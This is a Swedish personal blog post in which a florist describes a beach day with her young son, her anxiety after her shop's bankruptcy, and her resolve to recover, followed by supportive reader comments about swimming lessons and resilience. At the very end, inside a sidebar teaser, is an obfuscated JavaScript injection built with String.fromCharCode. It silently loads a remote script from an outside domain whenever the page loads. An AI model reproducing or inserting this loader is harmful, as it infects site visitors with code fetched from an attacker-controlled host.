INGENTING är omöjligt! -Glöm aldrig det!

OLYMPUS DIGITAL CAMERAGodkväll! Min energi är på topp! Träningen gjorde susen! Jag har levt på den ”Kicken” hela dagen. (förra inlägget) 

Svensk sommar är ju helt fantastisks! Jag har aldrig varit ledig under sommaren förut. Någon strödag då och då, men jag har lixom inte tagit mig tiden att ”bara vara” på stranden tex.

Idag har Sverige verkligen visat sig från sin bästa sida! Vi åkte tillbaka till vårat smultronställe. Ludvig hittade en kompis som han fastnade för direkt. Det visade sig vara en kompis som går på samma dagis. (vilken koll man har, not!) Dom har haft SÅ kul! Jag har badat med Lilleman, övat på att simma. Han kan inte simma än. Puffarna får vara på och vi övar teknik =)

Ludvig är fem år, är han sen? Borde han kunna simma?  Vad är ”normalt” ?? Han har inte gått på simskola, funderar på det till hösten…. OLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERAFullSizeRenderJag har tagit mig tiden att tänka idag, reflektera, fundera och planera. Jag kan få som en chock inifrån ”Shit, det är verkligen sant” jag har inte min butik längre. jag kan känna hur luftstrupen snöras åt, hur trycket över bröstet kommer… Jag får slängar av ångest hela tiden. men jag andas….. och säger till mig själv ”det kommer bli bra” Varje gång detta har hänt idag så har jag även sagt, högt för mig själv… Idag ÄR en bra dag! det ska ingen eller något få ta ifrån mig…. Jag känner mig lugn inombords.inredacom, odd molly, odd molly home, my martens, inredning, rice, ricedk, annelie inreda com, my martens konkurs, expressen, aftonbladet, heminredning, Blott ÄR flott!!! Världens gosigaste badlakan! Kvalitet är outstanding! En av alla godingar ifrån Odd Molly Home kollektionen från Annelie. haha! jag skrattar fortfarande åt att jag inte hade den blekaste aning om att Odd Molly hade heminredning… Tur att jag inte är trendspanare för heminredning 😉 hehe! Kika in på alla andra modeller förutom denna blåa goding HÄR 

IMG_7807Denna fiiiina väskan fick jag i present av Annelie. Den gör mig verkligen glad! Den kommer att få hänga med mig och Lilleman på beachen i sommar!

Nu när det är som det är med utreseförbud, revision, konkurs och allt annat så ska jag passa på att försöka göra det bästa av situationen. Självklart sörja, bearbeta, älta, gråta, bryta ihop… men också Koppla av, samla krafter, ladda om, fokusera och komma igen, starkare än någonsin!!! Inget ont so inte har något gott med sig! Tiden läker alla sår. Det vill/orkar man inte alltid att höra. Men det är ju så sant. Visst blir man ärrad. Men även ärren bleknar med tiden. Jag har lärt mig SÅ mycket under mina tio år med butiken My’s Blommor. Av både bra och mindre bra saker. Av egna misstag, av svek och felaktiga beslut. Jag ska försöka ta med mig alla mina erfarenheter och vända dom till något positivt. Jag startade upp My’s blommor som tonåring. Jag hade INGEN utbildning, inget kapital, ingen investerare, ingen bank bakom mig. Jag tjänade min första miljon redan första året. Jag stod på en grusplan utanför Lothars i Färjestaden på Öland. Jag köpte en fastighet, jag trollade med knäna för att kunna genomföra den affären. INGEN trodde på mig (förutom Ludvigs pappa) Alla bad mig att inte genomföra min dröm. Jag köpte fastigheten, jag gjorde om, expanderade, jag satte Arontrop 102 på kartan! Jag skrämde dom stora koncernerna genom att dyka upp från ”ingenstans” och plocka andelar ifrån hela regionens marknad…. Jag gjorde succé. ”Årets florist” ”Årets unga företagare” ”Årets entreprenör”

Nu Har jag ju också gjort konkursen. ”årets katastrof  Jag gick från topp till botten. Av måååååånga anledningar. Jag har jätte svårt att förlika mig med detta. Jag drömmer mardrömmar, slåss mot ångestattacker. Gråter inombords…..  Men jag SKA vända blad nu. Jag SKA komma tillbaka på ett eker annat sätt.

En sak jag skulle vilja säga till er alla därute, oavsett vad DU drömmer om. Eller vad DU vill ha ut av din framtid. Så länge som du tror på dig själv, dina idéer så kan du komma hur långt som helst! Sluta aldrig tro, kämpa för det du vill ha……. INGENTING är omöjligt! <3 Glöm aldrig det!

Nu när jag ändå är sentimental och mår bra för stunden så vill jag passa på att tacka er alla som stöttar, peppar, kommenterar, mailar och visar eran omtanke och kärlek! Det är ovärdeligt! TACK <3 Stor kram

/ My Martens 

25 Komentarer

 1. Apropå träning. Börja boxas, jisses vad man kan banka ur sig ilska och förtvivlan på en ”säck”. Eller om man får tag på en träningspartner som kan ”ta emot” alla slagen.
  Jag slog mig ur en smutsig och ful skilsmässa och vårdnadstvist. Men jag tog mig igenom den starkare i både kropp och själ.

  • JAAAAAAA! Vilken BRA ide! Jag har testat lite olika alternativ, that-boxning, kung fu m.m. Det ska jag verkligen göra! tack för tipset! Kram

 2. Bästa simskola tyckte jag var inomhus på vintern efter sommardagar vid strand o kul där:)) Skapar minnen att bara leka ,gräva, uppfinna kanaler ,slott osv. Sen längtar ungar till simskola o simhall på kalla årstiden för de var så härligt med vattenlek:) Provade olika men tyckte det var lagom, sen får dom via skolan i mellanstadiet efter simtest gratis simskola på skoltid om det behövs .Men lek o öva lite mellan sandslott e ju kul…( förskollärare kom visst fram här)Huvudsaken e ju att ni njuter, färger, vatten, värme gratis spa!!

 3. Livet är hårt, uppvuxen på Öland, adopterad, känner med dig.
  20 år, gift……..efter fyra år inte gift.
  Otrohet.
  Gift igen 1970, kontakt med biologiska föräldrar 1985.
  10 syskon jag inte visste om,var ensambarn innan.
  Lever fortfarande med samma man jag gifte mig med 1970.
  LIVET ÄR INTE SLUT VID 28, GLÖM ALDRIG DET…………KRAM…LYCKA TILl

 4. Va fint att Ludvig har så kul och hittade en kompis också. Visst går det bra att ha sköna dagar i Sverige också. Bra att du kämpar på genom alla faser som kommer med en förlust. Du är duktig. Kram ❤️

 5. Jag tycker det verkar som om du bearbetar det som hänt på rätt sätt. Ledsen och lite chockad emellanåt och sedan taggar och peppar dig själv när du tänker framåt. Jag har tänkt på det när jag har lyssnat på alla entreprenörer som sommarpratat att INGEN har bara lyckats hela tiden utan ALLA har gått på nitar och gjort saker som fått allvarliga konsekvenser. Misstagen har de tagit lärdom av och sedan gjort dem till klokare och bättre människor. Påminn dig hela tiden att du har gjort så gott du har kunnat (oftast har du gjort mer än så) och att mer kan ingen kräva av en och framförallt ska man inte kräva mer än så av sig själv. Du har inget att skämmas för!!!
  Om du inte får ordning på sömnen tycker jag att du skall överväga att ta hjälp med detta (mediciner). Jag vet av egen erfarenhet hur psyket tar stryk av för lång tid med dålig sömn. Bra att ta börjat träna igen, tänk bara på att lyssna på kroppen så att den får den återhämtning som den behöver. När jag gick i väggen för fler år sedan var träningen mitt bästa sätt för att se vilket skick min kropp var i. Ibland kunde jag genomföra träningen så som jag hade tänkt men några gånger fanns ingen kraft i kroppen och då fick jag gå hem och återhämta mig och ta det lugnt några dagar. Det kommer att blir bättre för dig, jag lovar, men det kommer alltid bakslag på vägen. Kram!

 6. Min son är 5 och han simmar inte. Han har gått i simskola 1 termin och där han de börjat öva på bentagen. Flyta kan han utan puffar.
  Jag har läst någonstans att barn innan 5 år inte kan lära sig simma på riktigt för de har inte den koordinationen som krävs.
  Så din son är inte sen.

 7. Du är en klok tjej! Och modig! Jag fattar inte hur du, från ingenting, kunde bygga din verksamhet. Så mycket lärdomar du tar med dig i livet. Du kommer på fötter igen och då kommer du att se tillbaka på tiden som har varit som en erfarenhet. Känns skönt att se att du hittar stunder att vila dig i.
  När det sedan gäller Lillemans simning, så är han absolut inte sen. Men det är bra att du tänker på och ser till att han lär sig. Simskola är jättebra! Kram

  • Ja, jag har haft två ”bra” drar där jag verkligen samlat kraft…… Det är nog så. Han älskar ju att bada, inte rädd för vatten men ändå har han respekt =) Kram

 8. Jag kan inte tänka mig att Ludvig är sen som inte kan simma vid 5år, jag har alltid trott att allt växer fram då de själva är mogna för det och tillräckligt motiverade, jag har för mig att mina var rätt så ”normala” som älskade att bada båda två, låtsatssimmade osv men på riktigt runt 7 års åldern. Du skulle nog bli en väldigt bra konsult och eller föreläsare för nyföretagar utbildningar. Du har ju verkligen varit med om jättetoppar och en mega dal och du skriver blogg och verkar ha talets gåva och få folk med dig.
  Utarbeta ett kursprogram med kost,träning och föreläsningar?
  Nu spånar jag bara men det är kanon att du vill och du kämpar för att vända detta. Kommer allt att vara ”klart” efter tisdag? jag menar kommer du inte behöva åka till My´s blommor mer sedan?
  <3

  • Hej! Ja, vad det gäller simningen så kommer det väl när det komet =) Ju mer vi övar ju bättre går det ju…Nej, det kommer inte att vara ”över” efter tisdag. Det är en öppen visning för auktions spekulanter som jag behöver närvara vid. Jag har några grejer kvar på kontoret som låste hämtas. Allt ska säljas på auktion. Papprean dvs, bokföringen ska revideras och gås igenom för åtminstone sju år tillbaka. Så det är en bit kvar innan det är ”över”. Ett steg i taget… Jag, föreläsningar kanske skulle vara någonting. Lite obehagligt att inte veta vad framtiden bär med sig, samtidigt lite spännande… Ha en skön dag! Kram

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/